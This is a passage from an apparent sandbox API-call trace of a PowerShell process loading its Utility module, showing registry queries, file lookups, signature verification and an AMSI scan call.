lpSystemInfo=0x933e22c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0219.201] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x933e1bc | out: phkResult=0x933e1bc*=0x8a8) returned 0x0 [0219.203] RegQueryValueExW (in: hKey=0x8a8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x933e1d8, lpData=0x0, lpcbData=0x933e1d4*=0x0 | out: lpType=0x933e1d8*=0x0, lpData=0x0, lpcbData=0x933e1d4*=0x0) returned 0x2 [0219.203] RegCloseKey (hKey=0x8a8) returned 0x0 [0219.204] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8a8 [0219.204] GetFileType (hFile=0x8a8) returned 0x1 [0219.204] GetFileType (hFile=0x8a8) returned 0x1 [0219.205] SetFilePointer (in: hFile=0x8a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x933e170*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933e170*=0) returned 0x0 [0219.205] ReadFile (in: hFile=0x8a8, lpBuffer=0x58004fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e19c, lpOverlapped=0x0 | out: lpBuffer=0x58004fc*, lpNumberOfBytesRead=0x933e19c*=0x983, lpOverlapped=0x0) returned 1 [0219.207] SetFilePointer (in: hFile=0x8a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x933e170*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933e170*=0) returned 0x983 [0219.208] ReadFile (in: hFile=0x8a8, lpBuffer=0x57ffa1f, nNumberOfBytesToRead=0x27d, lpNumberOfBytesRead=0x933e19c, lpOverlapped=0x0 | out: lpBuffer=0x57ffa1f*, lpNumberOfBytesRead=0x933e19c*=0x0, lpOverlapped=0x0) returned 1 [0219.208] SetFilePointer (in: hFile=0x8a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x933e170*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x933e170*=0) returned 0x983 [0219.208] ReadFile (in: hFile=0x8a8, lpBuffer=0x58004fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x933e19c, lpOverlapped=0x0 | out: lpBuffer=0x58004fc*, lpNumberOfBytesRead=0x933e19c*=0x0, lpOverlapped=0x0) returned 1 [0219.208] CoTaskMemAlloc (cb=0x20c) returned 0x785daf8 [0219.208] GetSystemDirectoryW (in: lpBuffer=0x785daf8, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0219.208] CoTaskMemFree (pv=0x785daf8) [0219.208] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0219.209] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0219.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e0d0) returned 1 [0219.209] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x933e14c | out: lpFileInformation=0x933e14c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0219.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e0cc) returned 1 [0219.209] GetSystemInfo (in: lpSystemInfo=0x933e180 | out: lpSystemInfo=0x933e180*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0219.209] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x933e110 | out: phkResult=0x933e110*=0x8ac) returned 0x0 [0219.211] RegQueryValueExW (in: hKey=0x8ac, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x933e12c, lpData=0x0, lpcbData=0x933e128*=0x0 | out: lpType=0x933e12c*=0x0, lpData=0x0, lpcbData=0x933e128*=0x0) returned 0x2 [0219.211] RegCloseKey (hKey=0x8ac) returned 0x0 [0219.211] CloseHandle (hObject=0x8a8) returned 1 [0219.215] CoCreateGuid (in: pguid=0x933e200 | out: pguid=0x933e200*(Data1=0xe1fb8b7e, Data2=0x79f2, Data3=0x486f, Data4=([0]=0xa6, [1]=0x24, [2]=0xdf, [3]=0x42, [4]=0x50, [5]=0x66, [6]=0xda, [7]=0xa7))) returned 0x0 [0219.216] QueryPerformanceCounter (in: lpPerformanceCount=0x933df60 | out: lpPerformanceCount=0x933df60*=31425049059) returned 1 [0219.216] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0219.216] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0219.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933de94) returned 1 [0219.216] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933df10 | out: lpFileInformation=0x933df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x983)) returned 1 [0219.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933de90) returned 1 [0219.216] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0219.217] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0219.217] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0219.217] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0219.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933de08) returned 1 [0219.217] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933de84 | out: lpFileInformation=0x933de84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x983)) returned 1 [0219.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933de04) returned 1 [0219.217] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0219.217] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0219.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933dddc) returned 1 [0219.217] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8a8 [0219.218] GetFileType (hFile=0x8a8) returned 0x1 [0219.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ddd8) returned 1 [0219.218] GetFileType (hFile=0x8a8) returned 0x1 [0219.218] WTGetSignatureInfo () returned 0x0 [0219.552] CertDuplicateCertificateContext (pCertContext=0x7887030) returned 0x7887030 [0219.553] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x933de40 | out: phkResult=0x933de40*=0x8b8) returned 0x0 [0219.554] RegQueryValueExW (in: hKey=0x8b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933de60, lpData=0x0, lpcbData=0x933de5c*=0x0 | out: lpType=0x933de60*=0x1, lpData=0x0, lpcbData=0x933de5c*=0x56) returned 0x0 [0219.554] RegQueryValueExW (in: hKey=0x8b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933de60, lpData=0x580e984, lpcbData=0x933de5c*=0x56 | out: lpType=0x933de60*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x933de5c*=0x56) returned 0x0 [0219.554] RegCloseKey (hKey=0x8b8) returned 0x0 [0219.554] CoTaskMemAlloc (cb=0x10) returned 0x7666ea0 [0219.554] CoTaskMemAlloc (cb=0x30) returned 0x32a8b40 [0219.554] WinVerifyTrust () returned 0x0 [0219.620] CoTaskMemFree (pv=0x32a8b40) [0219.620] CoTaskMemFree (pv=0x7666ea0) [0219.620] CertFreeCertificateContext (pCertContext=0x7887030) returned 1 [0219.620] CloseHandle (hObject=0x8a8) returned 1 [0219.620] AmsiOpenSession () returned 0x0 [0219.620] AmsiScanString () returned 0x80070015 [0220.279] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0220.280] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0220.286] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0220.286] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0220.286] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0220.286] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0220.308] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x64 [0220.308] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x64, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0220.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d894) returned 1 [0220.308] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x933d910 | out: lpFileInformation=0x933d910*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0220.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d890) returned 1 [0220.308] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0220.309] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0220.311] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x933d5cc, nSize=0xc3 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0xc2 [0220.312] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0220.313] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0220.314] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x51, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0220.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d69c) returned 1 [0220.314] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x933d718 | out: lpFileInformation=0x933d718*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0220.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d698) returned 1 [0220.317] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0220.319] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\fd1hvy\\documents\\windowspowershell\\modules")) returned 0xffffffff [0220.378] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0220.379] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0220.379] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x57, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x56 [0220.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d69c) returned 1 [0220.379] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x933d718 | out: lpFileInformation=0x933d718*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0220.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d698) returned 1 [0220.382] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0220.385] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules")) returned 0x10 [0220.386] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0220.386] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x59, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58 [0220.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933d69c) returned 1 [0220.386] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x933d718 | out: lpFileInformation=0x933d718*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0220.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933d698) returned 1 [0220.389] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0221.065] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0221.065] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0221.065] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0221.065] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0221.066] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0221.066] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0223.322] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20 [0223.322] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0223.322] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0223.323] CoTaskMemAlloc (cb=0x20c) returned 0x785cff8 [0223.323] GetSystemDirectoryW (in: lpBuffer=0x785cff8, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0223.323] CoTaskMemFree (pv=0x785cff8) [0223.323] GetFullPathNameW (in: 